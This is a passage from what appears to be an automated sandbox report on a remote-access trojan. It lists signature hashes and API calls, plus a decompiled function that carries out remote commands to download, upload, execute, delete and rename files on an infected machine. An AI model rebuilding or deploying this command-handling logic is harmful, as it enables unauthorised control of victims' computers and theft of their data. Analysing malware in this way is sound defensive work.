                      • Instruction Fuzzy Hash: EE4189721182409AC204FB21DC52DEF77A9BFA4748F50053FF846620F2EE785E4AC65B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • connect.WS2_32(?,0046DBA0,00000010), ref: 00404A23
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: connect
                      • String ID: TLS Authentication failed$[ERROR]
                      • API String ID: 1959786783-1964023390
                      • Opcode ID: 1aaa89cb3ab8e83ad8cf31946695e11ac04cd4fa2543e2936ab384321515aea8
                      • Instruction ID: 6a9958cf6c54f084319c11af7f7712e0ea3c55cf2f2f254842a4d7e8f6879e1c
                      • Opcode Fuzzy Hash: 1aaa89cb3ab8e83ad8cf31946695e11ac04cd4fa2543e2936ab384321515aea8
                      • Instruction Fuzzy Hash: 9C014C7138020197DF08BF6589C65673B599F81344B04402BEE059F2C7EA7ADC44CB6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
                      • RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
                      • RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseCreateValue
                      • String ID:
                      • API String ID: 1818849710-0
                      • Opcode ID: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                      • Instruction ID: e89491bdbf644e4e0ba0d344bde8c25a895909b1be654527de0f828c9f06b44b
                      • Opcode Fuzzy Hash: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                      • Instruction Fuzzy Hash: 7FF0C232040208BFCB00AFA0DC05DEE3B6CEF04B91F104226BD05A61A1EB759F10DA94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 00447661
                      • _free.LIBCMT ref: 0044769A
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004476A1
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free_free
                      • String ID:
                      • API String ID: 2716640707-0
                      • Opcode ID: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
                      • Instruction ID: 4b3672921d85d94027c856c8d4557e31c130c3ea1869d6c91df0e3c849bae827
                      • Opcode Fuzzy Hash: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
                      • Instruction Fuzzy Hash: 8AE0E537149A112AE222223A6C49E7B3619CFC67BA716002BF10886142DF288D0305AD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410904
                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410923
                      • RegCloseKey.ADVAPI32(?), ref: 0041092C
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID:
                      • API String ID: 3677997916-0
                      • Opcode ID: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                      • Instruction ID: 3e5bbf023fc67ff476987f8fad8e364188ed9517bf6302b110b94af4ea8623b3
                      • Opcode Fuzzy Hash: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                      • Instruction Fuzzy Hash: 66F0AFB5600308BBDB109F90DD05FED777C9B04B02F1000A6BB04B6191D6B4AB459BA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                      • RegCloseKey.KERNELBASE(?), ref: 004108CE
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID:
                      • API String ID: 3677997916-0
                      • Opcode ID: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                      • Instruction ID: 52561c361bf01b8e86e1a5ce9e630969f3828b93d2dbd7bb4aa450e57b23c49a
                      • Opcode Fuzzy Hash: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                      • Instruction Fuzzy Hash: A3F01D7690030CBFDF10AFA09C05FEEBBBCEB04B52F1041A5FA04E6195D2759B549B94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
                      • Instruction ID: 14bc11751579f6a418080d33961eb9a75802e287542bdf943e450bbe308a60cc
                      • Opcode Fuzzy Hash: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
                      • Instruction Fuzzy Hash: BCF0B4712142085BCB0C9E34AC91BBA375D5B11368BA44B7FF02EDA1E1D73BD984824C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
                      • Instruction ID: fba902ad4ccf31a8b90f9fdf44a17567959da2f799f45fbd848029ef9f978f3d
                      • Opcode Fuzzy Hash: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
                      • Instruction Fuzzy Hash: 56E0A02290541160E239363B7C0565B0265CBC973DF10432BF624C62C2EFAC884341AE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __EH_prolog.LIBCMT ref: 004186DA
                        • Part of subcall function 00402728: std::_Deallocate.LIBCONCRT ref: 00402B22
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: DeallocateH_prologstd::_
                      • String ID:
                      • API String ID: 3881773970-0
                      • Opcode ID: 1279e0660ded21508a7f724004055ae431ff02857b90cc6057ac6c92086fe970
                      • Instruction ID: 81f1575e26007701d47cce485488fb1d9f0d7f2c3705a4b1df04078d35adb080
                      • Opcode Fuzzy Hash: 1279e0660ded21508a7f724004055ae431ff02857b90cc6057ac6c92086fe970
                      • Instruction Fuzzy Hash: B6117F71A001149FCB15EF69C9867AEBBB6EF85314F10416FF500AB2E1DBB50901DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00422251: recv.WS2_32(?,?,?,?), ref: 0042225C
                      • WSAGetLastError.WS2_32 ref: 0042219B
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLastrecv
                      • String ID:
                      • API String ID: 2514157807-0
                      • Opcode ID: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
                      • Instruction ID: 5fd3ebf0e0d9901e6086a92a38d31c1d4f4930f82062b2ddb0320275891adbe9
                      • Opcode Fuzzy Hash: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
                      • Instruction Fuzzy Hash: B7F0A43230C1297A9F189959FE94C7933459F85374BB0436BFE3AC65F0EA6998602149
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 0042226A: send.WS2_32(?,?,?,?), ref: 00422275
                      • WSAGetLastError.WS2_32 ref: 0042220C
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLastsend
                      • String ID:
                      • API String ID: 1802528911-0
                      • Opcode ID: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
                      • Instruction ID: 207b8048d6da47c8d3e1bf0cf2b23625c58979fe3f9e08f58dd8cb8bfe01de6d
                      • Opcode Fuzzy Hash: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
                      • Instruction Fuzzy Hash: 19F0BB3530C534FADF18995CFE548393341AF45330B70439BF939866F0DA6E5850917A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
                      • Instruction ID: 400f104e77b540acbfcd3781324d28ce3e91d9a3d9d75f8370708e8767061156
                      • Opcode Fuzzy Hash: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
                      • Instruction Fuzzy Hash: 01E02BB290022177DB2126625C0075B36489F5D7B1F103037FD05922C0DB6CCC0582EE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • socket.WS2_32(00000000,00000001,00000006), ref: 004049AC
                        • Part of subcall function 004049DE: WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Startupsocket
                      • String ID:
                      • API String ID: 3996037109-0
                      • Opcode ID: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
                      • Instruction ID: 643c1d6dd67993fbe743bd4810411797e70fdf622d87f5941d6678f6439cf7cf
                      • Opcode Fuzzy Hash: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
                      • Instruction Fuzzy Hash: 68F0BEF10057905AE7314F344880393BFD45B52318F14897FE6D2A3BC2C2B9A819C76A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Startup
                      • String ID:
                      • API String ID: 724789610-0
                      • Opcode ID: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
                      • Instruction ID: 820ae791bcbb1d2b57b63688d1298c64991293a60e6d01c8c57279511ad2648c
                      • Opcode Fuzzy Hash: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
                      • Instruction Fuzzy Hash: 59D0123255861C4ED611AAB4AD0F8A5B76CC313A12F4003BAACB5C25D3F650572CC2FB
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: send
                      • String ID:
                      • API String ID: 2809346765-0
                      • Opcode ID: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
                      • Instruction ID: fff77dfbf1f0459fa3aaeb9656e953647c3761fb795b74ea4a0806b79efbc88b
                      • Opcode Fuzzy Hash: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
                      • Instruction Fuzzy Hash: 70C04C79104608BB9B061FA19D08C793B69D7456617008025B90556151D576DA5096B5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      C-Code - Quality: 81%
                      			E0040697D(short* __edx, void* __eflags, intOrPtr _a4) {
                      				char _v108;
                      				void* _v112;
                      				char _v132;
                      				char _v136;
                      				char _v140;
                      				char _v152;
                      				char _v156;
                      				char _v160;
                      				void* _v176;
                      				char _v180;
                      				char _v192;
                      				void* _v204;
                      				char _v208;
                      				char _v212;
                      				char _v216;
                      				void* _v224;
                      				char _v228;
                      				char _v232;
                      				char _v236;
                      				char _v240;
                      				char _v244;
                      				void* _v248;
                      				char _v252;
                      				char _v256;
                      				char _v260;
                      				char _v264;
                      				char _v268;
                      				char _v272;
                      				char _v276;
                      				char _v280;
                      				char _v284;
                      				char _v288;
                      				char _v292;
                      				char _v296;
                      				void* _v300;
                      				void* _v308;
                      				void* _v312;
                      				char _v324;
                      				char _v336;
                      				char _v344;
                      				char _v348;
                      				char _v368;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed char _t160;
                      				signed int _t162;
                      				void* _t166;
                      				void* _t171;
                      				signed int _t172;
                      				void* _t187;
                      				void* _t202;
                      				signed int _t204;
                      				void* _t218;
                      				int _t228;
                      				void* _t235;
                      				void* _t236;
                      				void* _t249;
                      				void* _t256;
                      				signed int _t261;
                      				void* _t265;
                      				void* _t277;
                      				short* _t288;
                      				void* _t289;
                      				void* _t300;
                      				void* _t316;
                      				void* _t326;
                      				void* _t332;
                      				void* _t334;
                      				void* _t336;
                      				void* _t340;
                      				void* _t344;
                      				void* _t354;
                      				void* _t356;
                      				void* _t377;
                      				void* _t380;
                      				void* _t542;
                      				void* _t569;
                      				intOrPtr _t574;
                      				intOrPtr _t575;
                      				signed int _t576;
                      				signed int _t578;
                      				signed int _t581;
                      				void* _t588;
                      				void* _t590;
                      				void* _t592;
                      				void* _t594;
                      				void* _t596;
                      				signed int _t597;
                      				void* _t600;
                      				void* _t601;
                      				void* _t602;
                      				void* _t603;
                      				void* _t604;
                      				void* _t605;
                      				void* _t606;
                      				void* _t609;
                      				void* _t614;
                      				void* _t615;
                      				void* _t616;
                      				void* _t618;
                      				void* _t620;
                      				void* _t639;
                      				void* _t640;
                      				void* _t641;
                      				void* _t642;
                      				void* _t645;
                      				void* _t647;
                      
                      				_t646 = __eflags;
                      				_t550 = __edx;
                      				_push(_t356);
                      				_t574 = _a4;
                      				_push(_t569);
                      				E004020EC(_t356,  &_v156, __edx, __eflags, _t574 + 0x1c);
                      				SetEvent( *(_t574 + 0x34));
                      				_t575 =  *((intOrPtr*)(L00401F95( &_v160)));
                      				E004042A6( &_v160,  &_v136, 4, 0xffffffff);
                      				_t600 = (_t597 & 0xfffffff8) - 0xec;
                      				E004020EC(0x46c238, _t600, _t550, _t646, 0x46c238);
                      				_t601 = _t600 - 0x18;
                      				E004020EC(0x46c238, _t601, _t550, _t646,  &_v152);
                      				E00417478( &_v288, _t550);
                      				_t602 = _t601 + 0x30;
                      				_t647 = _t575 - 0x8b;
                      				if(_t647 > 0) {
                      					_t576 = _t575 - 0x8c;
                      					__eflags = _t576;
                      					if(__eflags == 0) {
                      						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                      						_t160 = GetFileAttributesW(L00401EEB( &_v260));
                      						__eflags = _t160 & 0x00000010;
                      						if((_t160 & 0x00000010) == 0) {
                      							_t162 = DeleteFileW(L00401EEB( &_v260));
                      						} else {
                      							_t162 = E00417754(L00401EEB( &_v260));
                      						}
                      						__eflags = _t162;
                      						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
                      						if(__eflags == 0) {
                      							_t603 = _t602 - 0x18;
                      							E0041739C(0x46c238, _t603,  &_v252);
                      							_push(0x55);
                      							L00404AA4(0x46c238, 0x46c2e8,  &_v252, __eflags);
                      							_t166 = E0041733B( &_v208,  &_v280);
                      							_t604 = _t603 - 0x18;
                      							_t553 = "Unable to delete: ";
                      							E004075C2(0x46c238, _t604, "Unable to delete: ", _t569, __eflags, _t166);
                      							_t605 = _t604 - 0x14;
                      							_t377 = _t605;
                      							_push("[ERROR]");
                      						} else {
                      							_t187 = E0041733B( &_v180,  &_v252);
                      							_t609 = _t602 - 0x18;
                      							_t553 = "Deleted file: ";
                      							E004075C2(0x46c238, _t609, "Deleted file: ", _t569, __eflags, _t187);
                      							_t605 = _t609 - 0x14;
                      							_t377 = _t605;
                      							_push("[Info]");
                      						}
                      						E00402084(0x46c238, _t377);
                      						L00416C80(0x46c238, _t569);
                      						_t606 = _t605 + 0x30;
                      						L00401FC7();
                      						_t171 = L00401E49( &_v288, _t553, __eflags, 1);
                      						_t550 = "1";
                      						_t380 = _t171;
                      						_t172 = E00405A6F("1");
                      						__eflags = _t172;
                      						if(_t172 == 0) {
                      							L40:
                      							L00401EF0();
                      							L41:
                      							L00401E74( &_v284, _t550);
                      							L00401FC7();
                      							L00401FC7();
                      							return 0;
                      						} else {
                      							__eflags = E00407323( &_v272, _t380, _t380) + 1;
                      							E0040733F(E00407323( &_v272, _t380, _t380) + 1);
                      							_t550 =  &_v284;
                      							L00401EFA( &_v284,  &_v284, _t576, L00402FFA(0x46c238,  &_v212,  &_v284, 0x2a));
                      							L00401EF0();
                      							E0040427F(0x46c238, _t606 - 0x18, L00401EEB( &_v288));
                      							L39:
                      							E004061C3();
                      							goto L40;
                      						}
                      					}
                      					_t578 = _t576 - 1;
                      					__eflags = _t578;
                      					if(__eflags == 0) {
                      						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                      						E0040427F(0x46c238,  &_v216, L00401F95(L00401E49( &_v272, _t550, __eflags, 1)));
                      						E00407309( &_v276,  &_v252, 0, E00407323( &_v268,  &_v216,  &_v216) + 1);
                      						_t202 = L00401EEB(E00407629( &_v216,  &_v264,  &_v240));
                      						_t204 = E00439924(L00401EEB( &_v288), _t202);
                      						asm("sbb bl, bl");
                      						L00401EF0();
                      						_t361 =  ~_t204 + 1;
                      						__eflags =  ~_t204 + 1;
                      						if(__eflags == 0) {
                      							_t550 = E004075E6( &_v180, "Unable to rename file!", __eflags, 0x46c238);
                      							E00405343(_t361, _t602 - 0x18, _t206, _t569, __eflags, "16");
                      							_push(0x59);
                      							L00404AA4(_t361, 0x46c2e8, _t206, __eflags);
                      							L00401FC7();
                      						} else {
                      							_t550 =  &_v228;
                      							E00407514(_t602 - 0x18,  &_v228, __eflags, "*");
                      							E004061C3();
                      						}
                      						L00401EF0();
                      						L13:
                      						L00401EF0();
                      						goto L40;
                      					}
                      					_t581 = _t578 - 1;
                      					__eflags = _t581;
                      					if(__eflags == 0) {
                      						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                      						_t218 = L00401F95(L00401E49( &_v272, _t550, __eflags, 1));
                      						_t550 =  &_v264;
                      						CreateDirectoryW(L00401EEB(E00407514( &_v192,  &_v264, __eflags, _t218)), 0);
                      						L00401EF0();
                      						E00403300(0x2a);
                      						E00407350(0x46c238, _t602 - 0x18,  &_v264, __eflags,  &_v268);
                      						goto L39;
                      					}
                      					_t583 = _t581 - 3;
                      					__eflags = _t581 - 3;
                      					if(__eflags == 0) {
                      						_t228 = StrToIntA(L00401F95(L00401E49( &_v264, _t550, __eflags, _t583)));
                      						_t550 = L00401F95(L00401E49( &_v268, _t550, __eflags, 1));
                      						L00417F10(_t228, _t230);
                      					}
                      					goto L41;
                      				}
                      				if(_t647 == 0) {
                      					E004020D5(0x46c238,  &_v180);
                      					E0040484E(0x46c238,  &_v108, 1);
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					E00404A08(_t550);
                      					_t235 = L00401E49( &_v284, _t550, __eflags, 3);
                      					_t614 = _t602 - 0xfffffffffffffff8;
                      					_t236 = L00401E49( &_v288, _t550, __eflags, 2);
                      					L00402F93(0x46c238, _t614, L00402F93(0x46c238,  &_v236, L00402F93(0x46c238,  &_v260, L00402FB7( &_v284, L00401E49( &_v292, _t550, __eflags, 1), 0x46c238), __eflags, _t236), __eflags, 0x46c238), __eflags, _t235);
                      					L00404AA4(0x46c238,  &_v140, _t240, __eflags);
                      					L00401FC7();
                      					L00401FC7();
                      					L00401FC7();
                      					E0040427F(0x46c238,  &_v292, L00401F95(L00401E49( &_v324, _t240, __eflags, 0)));
                      					_t249 = E0041733B( &_v272,  &_v296);
                      					_t615 = _t614 - 0x18;
                      					E004075C2(0x46c238, _t615, "Downloading file: ", _t602 - 0x10, __eflags, _t249);
                      					_t616 = _t615 - 0x14;
                      					E00402084(0x46c238, _t616, "[Info]");
                      					L00416C80(0x46c238, "[Info]");
                      					L00401FC7();
                      					L00401EF0();
                      					_t256 = L00401F95(L00401E49( &_v336, "Downloading file: ", __eflags, 0));
                      					_t618 = _t616 + 0x30 - 0x18;
                      					E0040427F(0x46c238, _t618, _t256);
                      					_t261 = E004062D8( &_v192, __eflags, E004398A0(_t258, L00401F95(L00401E49( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
                      					_t620 = _t618 + 0x2c;
                      					_push(0);
                      					__eflags = _t261;
                      					if(__eflags == 0) {
                      						E0040427F(0x46c238,  &_v264, L00401F95(L00401E49( &_v348, "Downloading file: ", __eflags)));
                      						_t265 = E0041733B( &_v244,  &_v268);
                      						_t550 = "Failed to download file: ";
                      						E004075C2(0x46c238, _t620 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t265);
                      						E00402084(0x46c238, _t620 - 4, "[ERROR]");
                      						L00416C80(0x46c238, "[Info]");
                      						L00401FC7();
                      						L00401EF0();
                      					} else {
                      						E0040427F(0x46c238,  &_v264, L00401F95(L00401E49( &_v348, "Downloading file: ", __eflags)));
                      						_t277 = E0041733B( &_v244,  &_v268);
                      						_t550 = "Downloaded file: ";
                      						E004075C2(0x46c238, _t620 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t277);
                      						E00402084(0x46c238, _t620 - 4, "[Info]");
                      						L00416C80(0x46c238, "[Info]");
                      						L00401FC7();
                      						L00401EF0();
                      						E00402084(0x46c238, _t620 - 4 + 0x30 - 0x18, 0x45f6bc);
                      						_push(0x58);
                      						L00404AA4(0x46c238,  &_v156, "Downloaded file: ", __eflags);
                      					}
                      					L00404E0B( &_v140);
                      					L00404E2F(0x46c238,  &_v140, 0);
                      					L15:
                      					L00401FC7();
                      					goto L41;
                      				}
                      				_t588 = _t575 - 0x61;
                      				if(_t588 == 0) {
                      					E0040427F(0x46c238, _t602 - 0x18, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                      					_t288 = L00401E49( &_v272, _t550, __eflags, 2);
                      					_t289 = L00401E49( &_v276, _t550, __eflags, 1);
                      					_t550 = _t288;
                      					E004169CC(_t289, _t288);
                      					goto L41;
                      				}
                      				_t590 = _t588 - 0x26;
                      				if(_t590 == 0) {
                      					GetLogicalDriveStringsA(0x64,  &_v108);
                      					E004020AB(0x46c238,  &_v252, _t550, __eflags,  &_v108, 0x64);
                      					__eflags = E00407397( &_v260, 0x45f860, 0, 2) + 1;
                      					L00401F84(E00407397( &_v260, 0x45f860, 0, 2) + 1);
                      					E004020EC(0x46c238, _t602 - 0x18, _t550, E00407397( &_v260, 0x45f860, 0, 2) + 1,  &_v276);
                      					_t300 = E00406406(0x46c238,  &_v256);
                      					_t550 = L00402FB7( &_v232,  &_v280, 0x46c238);
                      					L00402F1D(_t602 - 0x18, _t301, _t300);
                      					_push(0x51);
                      					L00404AA4(0x46c238, 0x46c2e8, _t301, __eflags);
                      					L00401FC7();
                      					L00401FC7();
                      					goto L15;
                      				}
                      				_t592 = _t590 - 1;
                      				if(_t592 == 0) {
                      					E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                      					E00407350(0x46c238, _t602 - 0x18, _t550, __eflags,  &_v260);
                      					E004061C3();
                      					__eflags = E00402489() - 2;
                      					_t316 = E0041733B( &_v228, E00407309( &_v264,  &_v240, 0, E00402489() - 2));
                      					_t550 = "Browsing directory: ";
                      					E004075C2(0x46c238, _t602 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t569, E00402489() - 2, _t316);
                      					E00402084(0x46c238, _t602 - 0x18 + 0x18 - 4, "[Info]");
                      					L00416C80(0x46c238, _t569);
                      					L00401FC7();
                      					goto L13;
                      				}
                      				_t594 = _t592 - 1;
                      				if(_t594 == 0) {
                      					E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                      					ShellExecuteW(0, L"open", L00401EEB( &_v260), 0, 0, 1);
                      					_t326 = E0041733B( &_v212,  &_v260);
                      					_t550 = "Executing file: ";
                      					E004075C2(0x46c238, _t602 - 0x18, "Executing file: ", _t569, __eflags, _t326);
                      					E00402084(0x46c238, _t602 - 4, "[Info]");
                      					L00416C80(0x46c238, _t569);
                      					L00401FC7();
                      					goto L40;
                      				} else {
                      					_t596 = _t594 - 1;
                      					_t652 = _t596;
                      					if(_t596 == 0) {
                      						E004072F6( &_v108);
                      						_t332 = L00401E49( &_v264, _t550, _t652, 3);
                      						_t639 = _t602 - 0x18;
                      						E004020EC(0x46c238, _t639, _t550, _t652, _t332);
                      						_t334 = L00401E49( &_v272, _t550, _t652, 2);
                      						_t640 = _t639 - 0x18;
                      						E004020EC(0x46c238, _t640, _t550, _t652, _t334);
                      						_t336 = L00401E49( &_v280, _t550, _t652, 1);
                      						_t641 = _t640 - 0x18;
                      						E004020EC(0x46c238, _t641, _t550, _t652, _t336);
                      						_push(L00401F95(L00401E49( &_v288, _t550, _t652, _t596)));
                      						_t340 = E004064A2( &_v136, _t550);
                      						_push(_t596);
                      						_t653 = _t340;
                      						if(_t340 == 0) {
                      							E0040427F(0x46c238,  &_v252, L00401F95(L00401E49( &_v368, _t550, __eflags)));
                      							_t344 = E0041733B( &_v232,  &_v256);
                      							_t642 = _t641 - 0x18;
                      							_t550 = "Failed to upload file: ";
                      							E004075C2(0x46c238, _t642, "Failed to upload file: ", _t569, __eflags, _t344);
                      							_t542 = _t642 - 0x14;
                      							_push("[ERROR]");
                      						} else {
                      							E0040427F(0x46c238,  &_v252, L00401F95(L00401E49( &_v368, _t550, _t653)));
                      							_t354 = E0041733B( &_v232,  &_v256);
                      							_t645 = _t641 - 0x18;
                      							_t550 = "Uploaded file: ";
                      							E004075C2(0x46c238, _t645, "Uploaded file: ", _t569, _t653, _t354);
                      							_t542 = _t645 - 0x14;
                      							_push("[Info]");
                      						}
                      						E00402084(0x46c238, _t542);
                      						L00416C80(0x46c238, _t569);
                      						L00401FC7();
                      						L00401EF0();
                      						L00407304(0x46c238,  &_v132, _t596);
                      					}
                      					goto L41;
                      				}
                      			}

                      APIs
                      • SetEvent.KERNEL32(?,?), ref: 0040699F
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406B88
                        • Part of subcall function 004064A2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
                        • Part of subcall function 004062D8: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00406331
                        • Part of subcall function 004062D8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00406379
                        • Part of subcall function 004062D8: CloseHandle.KERNEL32(00000000), ref: 004063B3
                        • Part of subcall function 004062D8: MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
                        • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                        • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                        • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                      • GetLogicalDriveStringsA.KERNEL32 ref: 00406C73
